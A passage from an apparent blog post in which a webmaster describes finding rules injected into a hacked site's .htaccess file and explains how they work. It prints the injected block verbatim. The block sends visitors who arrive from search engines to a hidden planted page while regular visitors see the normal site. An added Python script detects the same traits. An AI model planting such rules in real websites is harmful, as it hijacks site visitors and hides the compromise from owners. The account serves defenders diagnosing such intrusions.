So the problem is solved. Huzzah and hoorah.
But it’s a weird one. Someone pointed out that, after a bit of packet sniffing, it looked like the dodgy pages actually originated from the genuine IP address. So while the first reaction of any technologist is to blame everyone and anyone else, maybe, just maybe, that was a little hasty.
So, out comes PuTTY, and a quick scan of the root directory for that domain later and … that’s odd. The .htaccess file has been changed way more recently than I might have expected (and it’s a little bigger).
8 -rw-r--r-- 1 lowfield users 4961 Oct 24 00:46 .htaccess
Odd, though, because the permissions should make it that it’s only me that can write to that file (644).
But there it is, hidden away padded by loads of whitespace:
# a0b4df006e02184c60dbf503e71c87ad
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_-]+.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24). [NC]
RewriteCond %{HTTP_REFERER} [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)=
RewriteCond %{HTTP_REFERER} =[^&]+(%3A|%22)
RewriteCond %{TIME_SEC} <54
RewriteRule ^.*$ /ctte/elire/t.htm [L]
# a995d2cc661fa72452472e9554b5520c
For the benefit of those not fluent in the arcane ways of RegExp and the Apache RewriteEngine, this was basically checking to see if you’d come from a search engine and, if you had, delivering a different page (although only in 90% of instances, because the TIME_SEC condition only matches during the first 54 seconds of each minute).
Most times when you click on a link, your browser tells the new website where you came from, in what is known as the Referer header (HTTP_REFERER in the rules above), so this was using that to determine whether to do it. This meant that if people typed in the address, like regular users would, or used a bookmark, they would probably miss the redirection and be none the wiser.
And, to compound the ignominy, it had even written the guilty dodgy page on the local machine and hidden it in a sub-directory off the main directory. So it really was my site to blame.
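As an added example (not code from the original post), here is a small Python check that flags the traits this injected block showed: content hidden behind whitespace padding, a RewriteCond on HTTP_REFERER that names search engines, and a clock-based condition. The thresholds, the shortened engine list and the sample text are assumptions constructed for illustration.

```python
import os
import re
import sys

# Heuristics for the injection pattern on this page; thresholds are assumptions.
REFERER_COND = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}", re.I)
ENGINES = re.compile(r"google|yahoo|msn|yandex", re.I)
TIME_COND = re.compile(r"^\s*RewriteCond\s+%\{TIME(_[A-Z]+)?\}", re.I)
PAD_LINES = 20   # consecutive blank lines treated as padding
PAD_COLS = 80    # leading whitespace that pushes text off-screen


def scan_htaccess(text):
    """Return (line_number, reason) findings for one .htaccess body."""
    findings, blank_run = [], 0
    for n, raw in enumerate(text.splitlines(), 1):
        if not raw.strip():
            blank_run += 1
            continue
        if blank_run >= PAD_LINES:
            findings.append((n, "content follows %d blank lines" % blank_run))
        blank_run = 0
        indent = len(raw) - len(raw.lstrip(" \t"))
        if indent >= PAD_COLS:
            findings.append((n, "content indented %d columns" % indent))
        if REFERER_COND.match(raw) and ENGINES.search(raw):
            findings.append((n, "rewrite conditioned on search-engine referer"))
        if TIME_COND.match(raw):
            findings.append((n, "rewrite conditioned on clock value"))
    return findings


# Constructed sample: a benign directive, padding, then a shortened rule block.
SAMPLE = (
    "Options -Indexes\n" + "\n" * 30 + " " * 120 + "RewriteEngine On\n"
    "RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_-]+.)*(google|msn|yahoo). [NC]\n"
    "RewriteCond %{TIME_SEC} <54\n"
    "RewriteRule ^.*$ /placeholder/page.htm [L]\n"
)

if __name__ == "__main__":
    for root, _dirs, files in os.walk(sys.argv[1] if len(sys.argv) > 1 else "."):
        if ".htaccess" in files:
            path = os.path.join(root, ".htaccess")
            with open(path, errors="replace") as fh:
                for n, why in scan_htaccess(fh.read()):
                    print("%s:%d: %s" % (path, n, why))
```

Run with the document root as the only argument; a clock-based condition can be legitimate, so treat each hit as a prompt to read the file rather than as proof.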
Seems like I wasn’t the only one either, this is a very similar description and whaddya know,